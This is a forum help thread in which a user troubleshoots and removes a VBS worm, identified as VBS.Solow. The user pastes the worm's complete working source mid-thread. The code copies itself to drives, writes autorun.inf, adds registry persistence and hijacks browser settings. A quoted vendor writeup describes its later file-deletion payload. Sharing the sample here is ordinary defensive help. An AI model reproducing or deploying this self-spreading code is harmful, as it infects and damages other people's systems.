iisdll.dll.vbs file?

Hi Guys.

This is my first post.I think my system is infected with a virus, it’s sitting there as a start-up item

c:\windows\iisdll.dll.vbs

http://i16.tinypic.com/44imv0l.jpg

How do I delete that particular file? I searched that windows directory, but couldn’t find the file (it’s not hidden also). I tried even the command prompt DEL command, not working :frowning:

Please advice

LM ~

^

One more thing, I have Avast installed in my system, it’s not finding that virus either. :-\

Welcome to the forum linuxman.

Try scanning the file at Virus Total

http://www.virustotal.com/en/indexf.html

I’m always suspicious of files with a double extension such as .dll.vbs

You should uncheck the start-up entry for it (don’t delete the entry just yet) and reboot that should hopefully stop it running on boot.

You obviously have the show hidden files and folders ticked (?) but do you have the Hide extensions for known file types unchecked, see image ?

@ mauserme
If linuxman can’t find the file he is going to be unable to upload it.

A google search for iisdll.dll.vbs returns many hits, this is just one, http://www.greatis.com/appdata/d/Windows/i/iisdll.dll.vbs_Removal.htm

%WinDir%\IISDLL.dll.vbs is VBS.Solow.E. VBS.Solow.E is a worm that copies itself to removable drives.

Before you remove it (assuming you find it), add it to the avast chest User Files section and submit the sample to avast.

I completely missed the sentence below the image …

Yes, as you said - change the folder options, remove it from the startups and see if its found on reboot.

Thank you mauserme & David!

I had to use FileASSASSIN to delete the file.

I am posting the contents of the file here, it may be useful for you people for further reference

c:\windows\iisdll.dll.vbs

'My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe IISDLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\IISDLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by MOOzilla"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.lastchaos.in.th/"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Even though I removed the entire file and registry entry, still one problem remains

I am still not able to open my drives from My Computer by double clicking it.

Any idea how to solve this?

Thanks again!

If a virus is replicant (coming and coming again), you should:

  1. Disable System Restore on Windows ME or Windows XP. System Restore cannot be disabled on Windows 9x and it’s not available in Windows 2k. After boot you can enable System Restore again.

  2. Clean your temporary files. You can use CleanUp or the Windows Advanced Care features for that.

  3. It will be good if you download, install, update and run AVG Antispyware. Some users recommend SUPERantispyware, Spyware Terminator and/or a-squared (take care about false positives).

  4. Use the immunization of SpywareBlaster or, which is better, the Windows Advanced Care features of spyware/adware cleaning and removal.

One more thing, I scanned the file using http://virusscan.jotti.org/

Please see the results :-\

http://i16.tinypic.com/3zqe4vs.jpg

Can you send the samples to virus@avast.com ?
You can zip and password the files… Inform a link to this thread and the password used.
You can send the files to Chest and, from there, resend to Alwil for analysis.
Thanks.

Indeed it does not seem a false positive…

^
OK I sent it, meanwhile file is back in the same old location again!

This sucks :frowning:

Really? Do you think it is a false positive or you can’t get rid of it?

I used FileASSASSIN to delete the file completely, somehow it’s coming back (both file & registry entry) after the restart.

Don’t know the reason ???

btw, what is false positive?

http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-022815-2726-99&tabid=2

On the scripts 100th execution it will attempt to delete critical files including:

%SystemDrive%\boot.ini
%SystemDrive%\IO.SYS
%SystemDrive%\MSDOS.SYS
%SystemDrive%\NTDETECT.COM
%SystemDrive%\ntldr

and recursively delete all files, folders and subfolders on all available drives excluding the following:

%Windir%
%ProgramFiles%
%SystemDrive%\Documents and Settings

This value will not increment if the following file exists:
%Windir%\I will survive.txt

Needs to be gone ASAP VBS.Solow.D

Well there would appear to be another element restoring this file.

A false positive is a file that is detected as malware but subsequently proves to be a good file. This is why deletion is never a good first option.

If you haven’t already got this software (freeware), download, install, update and run it, preferably in safe mode.
Ewido, a.k.a. avg anti-spyware If using winXP.

^
I am downloading…

Also see http://virusinfo.prevx.com/pxparall.asp?PXC=29fd75689836 re vbs.solow.d it would look like this differs in that the name is different, but all seem to have the common double file extension of .dll.vbs.

Thanks everyone for the help. Finally the problem solved, thanks to AVG Anti-spy ware. One issue is still there,I am still not able to open my drives from My Computer by double clicking it.Right click-Open works fine. I think it’s because of that virus attack.

Any ideas??

Thanks again :slight_smile:

Why would you use my computer to do a task (opening drives), which is more applicable to explorer, or can’t you use that ?

Have you tried a google search cant open drives from my computer, I did and it returns many hits, http://www.google.com/search?q=cant+open+drives+from+my+computer, this is just one of them, http://www.daniweb.com/techtalkforums/thread68737.html
Check them out.

Sorry I also meant opening through explorer!

Please see the below pic.

http://i17.tinypic.com/2w24ldh.jpg

I couldn’t find any Autorun.inf file under the drive

Thanks

The Autorun.inf is superhidden. To see it, open Folder Option, choose View tab, choose Show hidden files and folders, and untick Hide protected operating system files, OK.